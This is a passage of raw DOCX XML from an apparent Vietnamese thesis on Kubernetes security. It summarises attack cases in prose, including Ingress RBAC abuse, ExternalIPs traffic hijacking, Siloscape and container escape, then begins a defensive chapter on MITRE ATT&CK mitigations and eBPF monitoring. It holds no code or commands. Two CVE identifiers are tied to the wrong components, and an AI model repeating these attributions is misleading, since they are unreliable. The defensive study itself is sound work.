        <w:t>Đối với cơ chế phân quyền RBAC lỏng lẻo, lỗ hổng CVE-2021-25741 liên quan đến cấu phần Ingress Controller là một ví dụ thực tế cho thấy việc lạm dụng quyền hạn có thể dẫn đến rò rỉ dữ liệu hệ thống. Kẻ tấn công có quyền tạo hoặc sửa đổi tài nguyên Ingress (thường là đội ngũ lập trình viên hoặc các Pod ứng dụng bị chiếm quyền) có thể chèn các đoạn cấu hình tùy biến để ép buộc hệ thống đọc và trích xuất các file nhạy cảm thuộc về API Server (như file chứa khóa token xác thực).</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:id w:val="-399824242"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Nat21 \l 1033 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="00D2786A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[12]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="57BAF7A3" w14:textId="32B45B8A" w:rsidR="00D2786A" w:rsidRPr="00D2786A" w:rsidRDefault="00D2786A" w:rsidP="00D2786A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D2786A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Những dẫn chứng thực tiễn này chỉ ra rằng, do Kubernetes đóng vai trò là "bộ não" điều phối toàn bộ hạ tầng đám mây của doanh nghiệp, bất kỳ sai sót nào trong việc thiết lập ranh giới tường lửa cho API Server hay việc lạm dụng quyền hạn RBAC mặc định đều mang lại hậu quả dây chuyền, tạo điều kiện cho tin tặc vô hiệu hóa hoàn toàn các lớp phòng thủ nội bộ và chiếm quyền kiểm soát hạ tầng thông tin trong tích tắc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067C70DB" w14:textId="2C44E580" w:rsidR="00026BE1" w:rsidRPr="00026BE1" w:rsidRDefault="00026BE1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc235976361"/>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lỗ hổng liên quan đến Kiến trúc Mạng (Container Networking)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="2BDDF735" w14:textId="273A8F17" w:rsidR="00FA6802" w:rsidRPr="00FA6802" w:rsidRDefault="00FA6802" w:rsidP="00FA6802">
      <w:r w:rsidRPr="00FA6802">
        <w:t>Tính chất nguy hiểm của kiến trúc mạng phẳng và việc thiếu mã hóa lưu lượng nội bộ đã biến phân lớp mạng container thành môi trường lý tưởng cho các kỹ thuật di chuyển ngang (Lateral Movement) và tấn công kẻ đứng giữa (MitM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D61796D" w14:textId="77777777" w:rsidR="00FA6802" w:rsidRPr="00FA6802" w:rsidRDefault="00FA6802" w:rsidP="00FA6802">
      <w:r w:rsidRPr="00FA6802">
        <w:t xml:space="preserve">Dẫn chứng điển hình là lỗ hổng thiết kế cốt lõi </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA6802">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2020-8554</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA6802">
        <w:t xml:space="preserve"> trong giao thức định tuyến của Kubernetes. Kẻ tấn công từ một Pod Frontend bị chiếm quyền có thể tạo dịch vụ mang thuộc tính ExternalIPs trùng với IP của một dịch vụ nhạy cảm nội bộ, từ đó ép buộc các Pod khác định tuyến sai hướng và đổ thẳng lưu lượng về Pod độc hại để đánh cắp dữ liệu thông tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7C4E40" w14:textId="52933402" w:rsidR="00FA6802" w:rsidRPr="00FA6802" w:rsidRDefault="00FA6802" w:rsidP="00FA6802">
      <w:r w:rsidRPr="00FA6802">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Bên cạnh lỗi định tuyến, cấu hình plugin mạng lỏng lẻo cũng bị lạm dụng để tấn công lan rộng. Trong chiến dịch mã độc nâng cao </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA6802">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Siloscape (2021)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA6802">
        <w:t xml:space="preserve"> nhắm vào cụm Kubernetes, tin tặc sau khi xâm nhập vào container vùng biên đã lập tức tận dụng mạng phẳng mặc định để quét dịch vụ, khai thác các cổng quản trị không được bảo vệ của các node lân cận nhằm thực thi mã và chiếm quyền toàn bộ hạ tầng đám mây.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-431592150"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="009410DD">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="009410DD" w:rsidRPr="009410DD">
            <w:instrText xml:space="preserve"> CITATION DPr21 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="009410DD">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009410DD" w:rsidRPr="009410DD">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> [13]</w:t>
          </w:r>
          <w:r w:rsidR="009410DD">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="67BF8770" w14:textId="6062CCA4" w:rsidR="00E67F80" w:rsidRPr="00175415" w:rsidRDefault="00FA6802" w:rsidP="00175415">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA6802">
        <w:t xml:space="preserve">Song song đó, việc các microservices truyền tải dữ liệu tối mật qua giao thức HTTP thuần túy tạo điều kiện cho các lỗ hổng tầng mạng (như </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA6802">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2015-3253</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA6802">
        <w:t xml:space="preserve"> trong </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA6802">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Docker-proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA6802">
        <w:t>) bị khai thác để nghe lén. Tin tặc chỉ cần triển khai công cụ bắt gói tin ở chế độ hỗn tạp (Promiscuous Mode) tại lớp mạng dùng chung là có thể trích xuất toàn bộ dữ liệu. Các sự kiện này chứng minh mạng container không thể chỉ bảo vệ bằng tường lửa vùng biên, mà bắt buộc phải triển khai cô lập mạng vi phân (Micro-segmentation) và cơ chế mã hóa dữ liệu di chuyển (mTLS).</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-241959532"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="009410DD">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="009410DD" w:rsidRPr="009410DD">
            <w:instrText xml:space="preserve"> CITATION NVD20 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="009410DD">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009410DD" w:rsidRPr="009410DD">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="009410DD" w:rsidRPr="009410DD">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[14]</w:t>
          </w:r>
          <w:r w:rsidR="009410DD">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="534190D9" w14:textId="20C28857" w:rsidR="00204C0D" w:rsidRPr="001B00BF" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc235976362"/>
      <w:bookmarkStart w:id="54" w:name="_Hlk236002749"/>
      <w:r w:rsidRPr="001B00BF">
        <w:t>XÂY DỰNG</w:t>
      </w:r>
      <w:r w:rsidR="00E67F80" w:rsidRPr="001B00BF">
        <w:t xml:space="preserve"> GI</w:t>
      </w:r>
      <w:r w:rsidR="00204C0D" w:rsidRPr="001B00BF">
        <w:t>ẢI PHÁP BẢO VỆ CHO HỆ THỐNG CONTAINER</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="155EC9A6" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRPr="009C66BE" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc235976363"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r w:rsidRPr="009C66BE">
        <w:t>Giới thiệu chương</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="706A9F99" w14:textId="57F36FF2" w:rsidR="00204C0D" w:rsidRPr="0056158A" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:r w:rsidRPr="0056158A">
        <w:t>Dựa trên kết quả phân tích các véc-tơ tấn công</w:t>
      </w:r>
      <w:r w:rsidR="00E67F80" w:rsidRPr="0056158A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0056158A">
        <w:t xml:space="preserve">tại Chương </w:t>
      </w:r>
      <w:r w:rsidR="00E67F80" w:rsidRPr="0056158A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="0056158A">
        <w:t xml:space="preserve"> (bao gồm Container Escape, đánh cắp Token đặc quyền và nghe lén mạng phẳng), </w:t>
      </w:r>
      <w:r w:rsidR="00E67F80" w:rsidRPr="0056158A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tại </w:t>
      </w:r>
      <w:r w:rsidRPr="0056158A">
        <w:t xml:space="preserve">chương này </w:t>
      </w:r>
      <w:r w:rsidR="00E67F80" w:rsidRPr="0056158A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">học viên </w:t>
      </w:r>
      <w:r w:rsidRPr="0056158A">
        <w:t xml:space="preserve">đề xuất một hệ thống phòng thủ đa lớp </w:t>
      </w:r>
      <w:r w:rsidR="00E67F80" w:rsidRPr="0056158A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>theo chiều sâu dựa trên</w:t>
      </w:r>
      <w:r w:rsidRPr="0056158A">
        <w:t xml:space="preserve"> mô hình Zero-Trust. Điểm </w:t>
      </w:r>
      <w:r w:rsidR="00E67F80" w:rsidRPr="0056158A">
        <w:t xml:space="preserve">cốt lõi </w:t>
      </w:r>
      <w:r w:rsidRPr="0056158A">
        <w:t>của chương là việc áp dụng phương pháp luận MITRE ATT&amp;CK để thiết kế kiến trúc, kết hợp với công nghệ eBPF tiên tiến để giải quyết bài toán</w:t>
      </w:r>
      <w:r w:rsidR="00E67F80" w:rsidRPr="0056158A">
        <w:t xml:space="preserve"> b</w:t>
      </w:r>
      <w:r w:rsidRPr="0056158A">
        <w:t xml:space="preserve">ảo đảm an ninh </w:t>
      </w:r>
      <w:r w:rsidR="00E67F80" w:rsidRPr="0056158A">
        <w:t xml:space="preserve">an toàn </w:t>
      </w:r>
      <w:r w:rsidRPr="0056158A">
        <w:t>ở mức nhân hệ điều hành nhưng không làm suy giảm hiệu năng vi dịch vụ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4579968F" w14:textId="52A1D87F" w:rsidR="00204C0D" w:rsidRPr="009823E1" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc235976364"/>
      <w:r w:rsidRPr="00212603">
        <w:t>Phương pháp luận</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="6491CE07" w14:textId="017BC198" w:rsidR="00204C0D" w:rsidRPr="009823E1" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00212603">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Việc thiết kế giải pháp</w:t>
      </w:r>
      <w:r w:rsidR="00E67F80" w:rsidRPr="00E67F80">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> phòng thủ</w:t>
      </w:r>
      <w:r w:rsidRPr="00212603">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> không dựa trên cảm tính hay chắp vá công cụ, mà được định hướng bởi các khung tham chiếu an ninh tiêu</w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> chuẩn</w:t>
      </w:r>
      <w:r w:rsidRPr="00212603">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4899D9D4" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRPr="00212603" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc235976365"/>
      <w:r w:rsidRPr="00212603">
        <w:lastRenderedPageBreak/>
        <w:t>Phân tích đối chiếu theo Khung MITRE ATT&amp;CK® cho Container</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="51467A73" w14:textId="1CF8C5F4" w:rsidR="00204C0D" w:rsidRPr="009823E1" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Để đảm bảo giải pháp có tính bao phủ toàn diện, đề án ánh xạ các </w:t>
      </w:r>
      <w:r w:rsidR="00E67F80" w:rsidRPr="00E67F80">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">phương thức tấn công </w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">tại Chương </w:t>
      </w:r>
      <w:r w:rsidR="00E67F80" w:rsidRPr="00E67F80">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> vào khung MITRE ATT&amp;CK, từ đó trích xuất các biện pháp đối phó (Mitigations) tương ứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D45EDA" w14:textId="21BE92D2" w:rsidR="00204C0D" w:rsidRPr="009823E1" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Kĩ thuật Leo thang đặc quyền &amp; Lẩn tránh phòng thủ</w:t>
      </w:r>
      <w:r w:rsidR="00E67F80" w:rsidRPr="00E67F80">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> h</w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">acker sử dụng kỹ thuật "Escape to Host" thông qua hostPath mount và đặc quyền </w:t>
      </w:r>
      <w:r w:rsidR="00E67F80" w:rsidRPr="00E67F80">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>privileged</w:t>
      </w:r>
      <w:r w:rsidR="00E67F80" w:rsidRPr="00E67F80">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49479933" w14:textId="599FB2F9" w:rsidR="00204C0D" w:rsidRPr="009823E1" w:rsidRDefault="00E67F80" w:rsidP="00204C0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E67F80">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Kĩ thuật đối phó</w:t>
      </w:r>
      <w:r w:rsidR="00204C0D" w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: Triển khai cơ chế kiểm soát tại </w:t>
      </w:r>
      <w:r w:rsidRPr="00E67F80">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>luông đầu</w:t>
      </w:r>
      <w:r w:rsidR="00204C0D" w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> vào</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67F80">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00204C0D" w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Admission Control</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67F80">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00204C0D" w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">để từ chối các cấu hình vi phạm, kết hợp thiết lập </w:t>
      </w:r>
      <w:r w:rsidRPr="00E67F80">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>tập luật</w:t>
      </w:r>
      <w:r w:rsidR="00204C0D" w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> hệ thống an toàn Seccomp/AppArmor</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67F80">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00204C0D" w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>nhằm vô hiệu hóa các System Calls</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67F80">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00204C0D" w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>nhạy cảm từ trong container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACD28B8" w14:textId="12AF4237" w:rsidR="00204C0D" w:rsidRPr="00212603" w:rsidRDefault="00E67F80" w:rsidP="00204C0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kĩ thuật</w:t>
      </w:r>
      <w:r w:rsidR="00204C0D" w:rsidRPr="00212603">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đ</w:t>
      </w:r>
      <w:r w:rsidR="00204C0D" w:rsidRPr="00212603">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ánh cắp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">thông tin </w:t>
      </w:r>
      <w:r w:rsidR="00204C0D" w:rsidRPr="00212603">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>định danh (Credential Access - TN-02): Khai thác "Service Account Token" của cụm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA009F7" w14:textId="25B75E8D" w:rsidR="00204C0D" w:rsidRPr="00212603" w:rsidRDefault="00E67F80" w:rsidP="00204C0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E67F80">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Kĩ thuật đối phó</w:t>
      </w:r>
      <w:r w:rsidR="00204C0D" w:rsidRPr="00212603">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Áp dụng nguyên tắc đặc quyền tối thiểu ở tầng RBAC, tự động thu hồi cơ chế automountServiceAccountToken ở các Pod không có chức năng gọi API nội bộ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AB0A85" w14:textId="5E7E3AF0" w:rsidR="00204C0D" w:rsidRPr="00212603" w:rsidRDefault="00E67F80" w:rsidP="00204C0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kĩ thuật</w:t>
      </w:r>
      <w:r w:rsidR="00204C0D" w:rsidRPr="00212603">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">do thám </w:t>
      </w:r>
      <w:r w:rsidR="00204C0D" w:rsidRPr="00212603">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mạng (Discovery &amp; Collection - TN-03): Nghe lén dữ liệu nội bộ qua kỹ thuật "Network Sniffing".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBF5639" w14:textId="77492089" w:rsidR="00204C0D" w:rsidRPr="00212603" w:rsidRDefault="00E67F80" w:rsidP="00204C0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E67F80">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Kĩ thuật đối phó</w:t>
      </w:r>
      <w:r w:rsidR="00204C0D" w:rsidRPr="00212603">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: Triển khai kiến trúc vi phân mảnh mạng Micro-segmentation ở Lớp 3/Lớp 4 (L3/L4) nhằm cô lập các vùng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">mạng </w:t>
      </w:r>
      <w:r w:rsidR="00204C0D" w:rsidRPr="00212603">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tin cậy, kết hợp mã hóa đường truyền.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105BB49B" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRPr="00212603" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc235976366"/>
      <w:r w:rsidRPr="00212603">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cơ sở khoa học của công nghệ eBPF (Extended Berkeley Packet Filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00212603">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="292C675E" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRPr="00E515F0" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E515F0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Để khắc phục điểm yếu của các giải pháp an ninh truyền thống (thường yêu cầu cài đặt Sidecar proxy hoặc Agent cồng kềnh vào từng container, gây tiêu tốn tài nguyên và tăng độ trễ), đề án lựa chọn eBPF làm công nghệ lõi cho phân hệ giám sát runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27863873" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRPr="009823E1" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
